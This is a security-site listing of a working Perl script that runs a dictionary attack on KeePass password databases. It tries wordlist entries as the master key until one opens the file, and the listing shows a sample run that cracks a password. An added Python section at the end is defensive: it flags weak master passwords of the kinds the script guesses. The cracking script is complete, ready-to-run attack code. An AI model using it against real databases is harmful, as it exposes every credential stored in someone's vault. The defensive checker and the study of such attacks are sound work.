KeePass Simple Dictionary Password Enumerator

2018.04.05
Credit: Todor Donev
Risk: Low
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

#!/usr/bin/perl
#
#  KeePass simple dictionary password enumerator
#
#  Copyright 2018 (c) Todor Donev <todor.donev at gmail.com>
#  https://ethical-hacker.org/
#  https://facebook.com/ethicalhackerorg
#
#  KeePass is a free open source password manager,
#  which helps you to manage your passwords in a
#  secure way. You can put all your passwords in one
#  database, which is locked with one master key or
#  a key file. So you only have to remember one single
#  master password or select the key file to unlock
#  the whole database. The databases are encrypted
#  using the best and most secure encryption algorithms
#  currently known (AES and Twofish).
#
#  Description:
#  Dictionary Attacks are a method of using a program
#  to try a list of words on the interface or program
#  that is protecting the area that you want to gain
#  access to. The most simple password crackers using
#  dictionary attacks use a list of common single words,
#  aka a "dictionary". More advanced programs often use
#  a dictionary on top of mixing in numbers or common
#  symbols at the beginning or end of the guessed words.
#  Some can even be given a set of personal information
#  or a profile of the user and pick out important words
#  to guess, even if they are not proper words, such as
#  pronouns like last names and names of relatives.
#  A weakness of dictionary attacks is that it obviously
#  relies on words supplied by a user, typically real words,
#  to function. If the password is misspelled, is in another
#  language, or very simply uses a word that is not in the
#  dictionary or profile, it cannot succeed. Most of the
#  time, even using two words in one password can thwart
#  a dictionary attack.
#
#
#  [todor@paladium ~]$ perl keepass.pl NewDatabase.kdbx wordlist.txt
#  [+] KeePass simple dictionary password enumerator
#  [*] ======
#  [?] Trying admin
#  [?] Trying 123456dqwdqwd
#  [?] Trying dhasdasdasdadasdassfsadfdsf
#  [?] Trying adsfdasdasdasdasd
#  [?] Trying sdafqwdqwdqw
#  [?] Trying sdadqwdqwdqdqw
#  [?] Trying fi3oj12gyu3123oiu1298ud89asuda9sduas98duas
#  [?] Trying sadfd87asdyhoijwqd98asud8asd
#  [?] Trying sadka98sud89asud98asdhjasidasodll
#  [?] Trying gfdkasjiohduiasdhaod
#  [?] Trying wdpasi9ud8uas7dhuasid
#  [?] Trying 3qgpdokasijdhuaygdqhwoidjpasjd
#  [?] Trying ewgdasdasdczxczxc
#  [?] Trying weczcxcasascsdvsdgdsfhsgfhdfd
#  [?] Trying gwehdfhfghergrwegagdsgdfgdfsgdfgsd
#  [?] Trying ggdsgdsfgdsfgdsfgsdf
#  [?] Trying gdfsgsddwqdqwdqwd
#  [*] ======
#  [!] Author: Todor Donev <todor.donev at gmail.com>
#  [!] https://ethical-hacker.org/
#  [!] https://fb.com/ethicalhackerorg
#  [*] ======
#  [*] Password for NewDatabase.kdbx is Ethical-Hacker-Bulgaria-2o18
#
#
#  Disclaimer:
#  This or previous programs is for Educational
#  purpose ONLY. Do not use it without permission.
#  The usual disclaimer applies, especially the
#  fact that Todor Donev is not liable for any
#  damages caused by direct or indirect use of the
#  information or functionality provided by these
#  programs. The author or any Internet provider
#  bears NO responsibility for content or misuse
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact
#  that any damage (dataloss, system crash,
#  system compromise, etc.) caused by the use
#  of these programs is not Todor Donev's
#  responsibility.
#
#  Use them at your own risk!
#
#  Requirements:
#  cpan install XML::Parser
#  cpan install Crypt::Rijndael
#  cpan install File::KeePass
#

use warnings;
use strict;
use File::KeePass;
use open ':std', ':encoding(UTF-8)';

my $k = File::KeePass->new;
my ($p, $w) = @ARGV;
print "[+] KeePass simple dictionary password enumerator\n";
&banner and die "[!] Usage: perl $0 <Keepass DBv1 or DBv2> <Wordlist>" if @ARGV != 2;
open (KEEPASSDB, "<$p") or die "[-] Error: $p $!";
die "[-]Error: The database is empty." if (-z $p);
close (KEEPASSDB);
open (WORDLIST, "<$w") or die "[-] Error: $w $!";
die "[-] Error: Wordlist is empty" if (-z $w);
my @file = <WORDLIST>;
print "[*] ======\n";
foreach my $c(@file) {
    chomp $c;
    if (! eval { $k->load_db($p, $c) }) {
        print "[?] Trying $c\n";
    } else{
        &banner and die "[*] Password for $p is $c\n";
    }
}
close (WORDLIST);
&banner and die "[-] Sorry, $@";

sub banner{
    print "[*] ======\n";
    print "[!] Author: Todor Donev <todor.donev at gmail.com>\n";
    print "[!] https://ethical-hacker.org/\n";
    print "[!] https://fb.com/ethicalhackerorg\n";
    print "[*] ======\n";
}
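
The Description in the script header names three cases: a single dictionary word, a word with digits or symbols added at the beginning or end, and two words in one password. The following is an added example, not part of the original script or of KeePass: a defender-side check that classifies a proposed master password into those cases before it is put on a database. The function name, the category labels and the sample wordlist are assumptions made for illustration.

```python
import re

# Constructed sample wordlist; in practice, load the same kind of list the
# script above reads as its second argument.
SAMPLE_WORDLIST = ["admin", "password", "keepass", "dragon", "letmein", "bulgaria"]

# Leading and trailing runs of digits or symbols ("numbers or common symbols
# at the beginning or end of the guessed words", per the script header).
AFFIX = re.compile(r"^([\d\W_]*)(.*?)([\d\W_]*)$", re.S)


def classify_master_password(candidate, wordlist):
    """Return which of the header's cases a proposed master password falls into.

    'dictionary-word'   : the password itself is in the wordlist
    'word-plus-affix'   : a wordlist entry with digits/symbols before or after it
    'two-words'         : two wordlist entries joined together
    'not-in-dictionary' : none of the above (says nothing else about strength)
    """
    words = {w.strip().lower() for w in wordlist if w.strip()}
    lowered = candidate.lower()

    if lowered in words:
        return "dictionary-word"

    prefix, core, suffix = AFFIX.match(lowered).groups()
    if core in words and (prefix or suffix):
        return "word-plus-affix"

    # Two entries concatenated: outside a plain single-word list, but still
    # built entirely from dictionary material.
    for i in range(1, len(core)):
        if core[:i] in words and core[i:] in words:
            return "two-words"

    return "not-in-dictionary"


if __name__ == "__main__":
    for pw in ["admin", "!Password2018", "dragonkeepass",
               "Ethical-Hacker-Bulgaria-2o18"]:
        print(f"{pw!r}: {classify_master_password(pw, SAMPLE_WORDLIST)}")
```

Rejecting the first two categories at password-change time removes the cases the header describes as the easiest for a dictionary attack.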


Copyright 2018, cxsecurity.com

 
